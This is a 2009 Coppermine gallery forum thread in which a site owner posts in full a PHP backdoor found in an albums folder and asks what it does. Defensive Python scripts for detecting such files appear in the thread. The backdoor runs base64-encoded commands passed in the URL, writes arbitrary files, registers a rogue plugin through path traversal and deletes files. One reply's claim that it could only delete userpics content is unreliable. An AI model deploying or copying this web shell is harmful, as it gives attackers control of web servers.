
Mystery php file

Started by Tezcatlipoca, February 07, 2009, 07:35:34 PM


Tezcatlipoca

I've just updated my cpg installation to 1.4.20, from 1.4.19, and noticed a .php file within /albums which I don't think I've noticed before.

The file name was "27e14dcb8d43e52d62e233484438643b.php", & the contents are quoted below.

It was dated 4th Feb. 2009.


To upgrade, I've since deleted *everything* from my cpg folder except my own album folders within /albums before then uploading 1.4.20 (I also checked my own album folders, & they only contain my jpegs).


Is this file I noticed normal?

<?
$hash="27e14dcb8d43e52d62e233484438643b";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash
="27e14dcb8d43e52d62e233484438643b";
if(
eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>
';

$codebase_str=str_replace("27e14dcb8d43e52d62e233484438643b", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>
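A defender's way to find files like the one quoted above: the scanner below (an added example, not code from the forum or from Coppermine) walks an albums/ tree and flags PHP files carrying the indicators visible in the posted file, namely eval() of a base64 request parameter, an INSERT into a *_plugins table, a long ../ chain, fopen() on a request parameter, and a 32-hex-character file name. The sample tree it builds is constructed; indicator names and thresholds are this example's own choices.

```python
import os
import re
import tempfile

# Indicator patterns derived from the file quoted in the first post (constructed for this example).
INDICATORS = {
    "eval_of_request_param": re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*\$_(GET|POST|REQUEST)'),
    "plugins_table_insert": re.compile(r'INSERT\s+INTO\s+`?\w*plugins`?', re.I),
    "deep_path_traversal": re.compile(r'(\.\./){3,}'),
    "file_write_from_request": re.compile(r'fopen\s*\(\s*\$_(GET|POST|REQUEST)'),
}
# Upload directories should hold no PHP at all; a 32-hex-character name is the naming seen in this thread.
HEX_NAMED_PHP = re.compile(r'^[0-9a-f]{32}\.php$')

def scan_file(path):
    """Return the indicator names that match the PHP file at `path` (empty list = nothing found)."""
    with open(path, encoding='utf-8', errors='replace') as fh:
        text = fh.read()
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if HEX_NAMED_PHP.match(os.path.basename(path)):
        hits.append("hex_named_php")
    return hits

def scan_tree(root):
    """Walk `root` (e.g. albums/) and map each flagged .php file, relative to root, to its indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith('.php'):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings

def build_sample_tree():
    """Create a constructed albums/ tree: a benign index.php plus a fragment mimicking the posted file."""
    root = tempfile.mkdtemp(prefix="cpg_albums_")
    os.makedirs(os.path.join(root, "userpics"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php // benign placeholder index.php (constructed) ?>\n")
    with open(os.path.join(root, "27e14dcb8d43e52d62e233484438643b.php"), "w") as fh:
        fh.write('<?php if(isset($_GET["eval"])){ eval(base64_decode($_GET["eval"])); }\n'
                 '$p="/../../../../../../home/x/public_html/cpg/albums/userpics";\n'
                 '$sql="INSERT INTO `cpg_plugins` (`name`,`path`) VALUES (\'Sumple Plugin\',\'$p\')"; ?>\n')
    return root

if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_tree()).items():
        print(rel, "->", ", ".join(hits))
```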


ullielfan

That's what I want to know too. I run several fansites and most of them have these strange files. ???

Hein Traag

Both of you read this thread: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

@ulliefan. Never hijack another user's thread, even if your problem is exactly the same.

Tezcatlipoca

Quote from: Hein Traag on February 08, 2009, 07:14:45 PM
Both of you read this thread: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

@ulliefan. Never hijack another user's thread, even if your problem is exactly the same.


Thanks for the reply, Hein Traag :)

I've had a read through that. I'm not sure what else I can/should do though, as I have already deleted my cpg install (except the albums) & uploaded & upgraded to version 1.4.20.


Tezcatlipoca

My paranoia has since caused me to wipe pretty much everything & start over.

I have deleted the mysql database & user for my cpg installation, along with the entire cpg folder itself on my webspace.

I also deleted my installation of Wordpress 2.7 (latest version).

I uploaded a fresh copy of cpg1.4.20 along with a fresh copy of Wordpress 2.7, created a new mysql database & user for cpg (with different names & password to the previous cpg DB & DB user), & then installed cpg from scratch.

I also had a look around my site, & the area above public_html, with FileZilla, to see if I could notice anything else.

Plus I changed all my passwords... cPanel/FTP, cpg, Wordpress, etc. And then changed them again. And again.


I just wish my initial panic hadn't caused me to delete everything in my cpg installation (bar my own albums) initially, as I don't know if there was anything else present as well as the strange php file mentioned in the first post (I think there was a "main.index.php" or something too, within /albums, which seeing a fresh install I now realise is prob. not something that should have been there).


Is there anything else I can do?


Is there anyone who can have a look at the php file I have quoted in the first post, & explain just what it would have been doing? [it makes no sense to me].


:)

Tezcatlipoca

I've just used WinMerge to compare the cpg database backup I made on Saturday (pre-wipe & fresh install with a new DB etc.) to the one I made in October.

There were a few minor differences, which to my untrained eye did not look important, however I did notice this at line 381 of the newer DB:

INSERT INTO `cpg1411_plugins` (`plugin_id`, `name`, `path`, `priority`) VALUES (1,'Sumple Plugin','/../../../../../../../../../../../../../home/<my webspace username>/public_html/<my cpg installation>/albums/userpics',0);


... which I recognise from my "Mystery php file".

So, although I know nothing about php or sql, it does look like this php file did access cpg's mysql database and inserted a reference to a "Sumple Plugin" apparently located within /albums/userpics.

Pity I wiped the lot when I did & didn't have a deeper look around first - would very much have liked to see just what this "plugin" was, if the file was actually there.


As I have never actually had plugins enabled on my cpg installation, would this "Sumple Plugin" have been able to do anything?
I suppose with malicious DB access plugins could actually have been enabled without me knowing though - how could I check that from my DB backup?


Also, just *how* would this breach have occurred in the first place?

Via the exploit in 1.4.19 which 1.4.20 patched?

Via permissions?


I did have /include, /albums, /albums/userpics and /albums/edit all set to 777, along with my own album folders within /albums - as that's what the documentation says, plus cpg actually refuses to install at all if they have their permissions set to anything other than 777.


However, on looking elsewhere since this happened, it sounds like having any folders set to 777 is actually a rather bad thing to have???!!!

When I reinstalled from fresh last night, I decided to have them set to 777 only temporarily:

- Once the installation was finished, I changed /include back to 755, as I don't see why any write permissions would still be needed once the config.inc.php file has been created.

- Once the installation was finished, I changed /albums/edit and /albums/userpics back to 755, as I have no users other than myself, and I only upload via FTP.

- Once I had used the cpg web admin interface to batch add my uploaded photos to Albums, I changed all my own album folders within /albums back to 755, as surely write permissions are no longer needed once the thumbnails & intermediate pictures have been created.
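To answer the "how could I check that from my DB backup?" question above: the script below (an added example, not from the forum or from Coppermine) reads a mysqldump-style backup, pulls every row inserted into a *_plugins table, and reports those whose path is absolute or climbs with "..". Coppermine 1.4 includes plugins/<path>/codebase.php for each registered plugin, which is why the posted file registers a traversal path pointing back into albums/userpics. The dump excerpt is constructed in the shape of the line quoted above.

```python
import re

# Constructed excerpt of a cpg1.4 mysqldump: one rogue row in the shape quoted above, one normal plugin row.
SAMPLE_DUMP = """\
INSERT INTO `cpg1411_config` (`name`, `value`) VALUES ('gallery_name','My Gallery');
INSERT INTO `cpg1411_plugins` (`plugin_id`, `name`, `path`, `priority`) VALUES (1,'Sumple Plugin','/../../../../../home/user/public_html/cpg/albums/userpics',0);
INSERT INTO `cpg1411_plugins` (`plugin_id`, `name`, `path`, `priority`) VALUES (2,'onlinestats','onlinestats',1);
"""

# Matches an INSERT into any table whose name ends in "plugins", whatever the installation's prefix.
PLUGIN_INSERT = re.compile(
    r"INSERT INTO `(?P<prefix>\w*?)plugins`\s*\([^)]*\)\s*VALUES\s*\((?P<values>.*?)\);", re.S)
# One SQL literal: a single-quoted string (with backslash escapes) or a bare integer.
VALUE = re.compile(r"'((?:[^'\\]|\\.)*)'|(\d+)")

def parse_plugin_rows(dump_text):
    """Yield (plugin_id, name, path, priority) as strings for every plugins row in the dump.
    Extended inserts (VALUES (...),(...)) are split on '),(' so each row is seen separately."""
    for m in PLUGIN_INSERT.finditer(dump_text):
        for row in m.group("values").split("),("):
            fields = [s or n for s, n in VALUE.findall(row)]
            if len(fields) == 4:
                yield tuple(fields)

def is_suspicious_path(path):
    """A plugin path should be a plain subdirectory name under plugins/; anything else is not legitimate."""
    return path.startswith("/") or ".." in path.split("/")

def find_rogue_plugins(dump_text):
    """Return only the plugin rows whose path would make Coppermine load code from outside plugins/."""
    return [row for row in parse_plugin_rows(dump_text) if is_suspicious_path(row[2])]

if __name__ == "__main__":
    for plugin_id, name, path, _priority in find_rogue_plugins(SAMPLE_DUMP):
        print(f"rogue plugin id={plugin_id} name={name!r} path={path}")
```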


Tezcatlipoca

Sorry, don't seem to be able to edit:

Just to point out that the "code" block is rather long, & scrolls past the width of the screen - more there than there appears at a glance.

Tezcatlipoca

Quote from: Tezcatlipoca on February 09, 2009, 11:44:20 PM
- Once I had used the cpg web admin interface to batch add my uploaded photos to Albums, I changed all my own album folders within /albums back to 755, as surely write permissions are no longer needed once the thumbnails & intermediate pictures have been created.

... oh, & changed /albums itself back to 755 too.

Tezcatlipoca

Does no-one have any help or advice based on what I have posted so far? :(

Hein Traag

Look, if you want to completely get rid of your paranoia, then completely delete the whole cpg. Reupload and install a new one. Re-add the pictures anew to the correct albums etc., and in the future check this site more often to keep up with new versions. Cpg1.5 is equipped with a method to alert admins of new versions, but until it is released that is up to you to keep an eye on.

Ludo

Quote from: Tezcatlipoca on February 09, 2009, 11:44:20 PM
would this "Sumple Plugin" have been able to do anything?
It seems it could have deleted all the /albums/userpics/ directory content.  :o

Quote
it sounds like having any folders set to 777 is actually a rather bad thing to have???!!!
I have them set to 755 since I opened my gallery without any inconvenience.

Tezcatlipoca

Quote from: Hein Traag on February 12, 2009, 08:08:07 AM
Look, if you want to completely get rid of your paranoia, then completely delete the whole cpg. Reupload and install a new one. Re-add the pictures anew to the correct albums etc., and in the future check this site more often to keep up with new versions. Cpg1.5 is equipped with a method to alert admins of new versions, but until it is released that is up to you to keep an eye on.

Thanks :) I've already done all that though.

I'm just concerned as to...

- What the consequences of this would have been or could have been. Is there still anything to worry about?

- How this actually happened.

- Whether it could have spread further than cpg.


The funny thing is that I checked this site just a few days before 1.4.20 was announced, saw it was still on 1.4.19 & went away...only to find when I checked again a week later that a) 1.4.20 had now been out a few days and b) somehow my site had already been hacked :(


Quote from: Ludo on February 12, 2009, 09:56:11 AM
It seems it could have deleted all the /albums/userpics/ directory content.  :o


Thanks for having a look :)

If that is all that it would have done, then tbh it's a relief as I didn't have any content within /albums/userpics anyway.

Quote from: Ludo on February 12, 2009, 09:56:11 AM
I have them set to 755 since I opened my gallery without any inconvenience.

Cool. I'll keep mine on 755 - I don't want to leave any possible holes for it to happen again.